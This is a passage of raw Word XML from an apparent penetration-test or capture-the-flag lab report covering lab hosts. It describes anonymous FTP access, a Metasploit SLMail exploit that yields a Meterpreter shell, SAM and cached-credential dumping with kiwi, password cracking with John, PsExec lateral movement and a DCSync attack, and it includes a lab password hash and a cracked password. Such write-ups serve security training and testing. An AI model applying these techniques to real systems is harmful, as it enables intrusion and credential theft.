      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> page, which contains the credentials </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">trivera:$apr1$A0vSKwao$GV3sgGAj53j.c3GkS4oUC0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, as illustrated in the following image:</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2476500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="14"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t xml:space="preserve">SIKYU TECH took the hashed password and cracked it using John The Reaper , shown below:</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="12"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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 12: NMAP Scan and FTP Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Method: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Returning to the port scan results revealed that port 21 (FTP) was open. Using Nmap with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-A</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag, SIKYU TECH discovered that anonymous FTP access was possible. Logging into the FTP server at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.22.117.20</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as an anonymous user, I downloaded the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag3.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. After exiting the FTP session, I read the contents of the file using the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat flag3.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which provided the next flag.</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="6527800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="20"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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 13: POP3</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Method:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Returning to the port scan results, SIKYU TECH noted that the SLMail service was running on both SMTP port 25 and POP3 port 110. Port 110 is required for the exploit. Using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">searchsploit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, WE found a Metasploit module for that version of SLMail. We loaded Metasploit via </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, selected the SLMail module, set the RHOSTS to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.22.117.20</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and ran the exploit, which granted a Meterpreter shell. Listing the directory files in the Meterpreter session revealed </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag4.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which we read using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command from within Meterpreter.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="24"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C1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 14: Security Accounts Manager Database</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Method: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After successfully compromising SLMail using Metasploit and gaining a Meterpreter shell where SIKYU TECH have SYSTEM privileges, We loaded </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kiwi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> within Meterpreter. Using the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lsa_dump_sam</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kiwi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> revealed a user named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag6</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the Security Accounts Manager (SAM) database. Cracking the NTLM password associated with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag6</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> exposed the password, unveiling Flag 6: Computer! This process allowed me to escalate privileges and obtain critical information from the compromised system.</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943600" cy="3340100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="10"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943600" cy="1689100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8"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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 15: lsadump::cache</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Method: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kiwi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to dump cached credentials on Win10 revealed that an administrator named ADMBob has their credentials cached. SIKYU TECH stored the username and hashed password into a file and cracked it using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, revealing the password: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Changeme!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. With these credentials, We gained access to the Server2019 machine. Using the PsExec module in Metasploit with ADMBob's credentials, then obtained a SYSTEM shell on Server2019, as depicted. Within the Meterpreter session, we listed users with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">net user</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, discovering a user named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag8</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="13"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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001ED">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 16: DCSync Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Method: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kiwi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to perform a DCSync attack on the Administrator user on Server2019 allowed SIKYU TECH to retrieve their NTLM password hash. This hash, identified as flag 10, was extracted using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kiwi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'s capability to interact with domain controllers and mimic the behavior of a Domain Controller Sync operation (DCSync). This method effectively captured sensitive credential information, highlighting potential security vulnerabilities and demonstrating the importance of securing privileged accounts within network environments.</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="11"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pStyle w:val="Heading2"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tr5kilpcz7z8" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table5"/>
        <w:tblW w:w="8985.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10"/>
        <w:gridCol w:w="1575"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="7410"/>
            <w:gridCol w:w="1575"/>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217">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218">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219">
            <w:pPr>
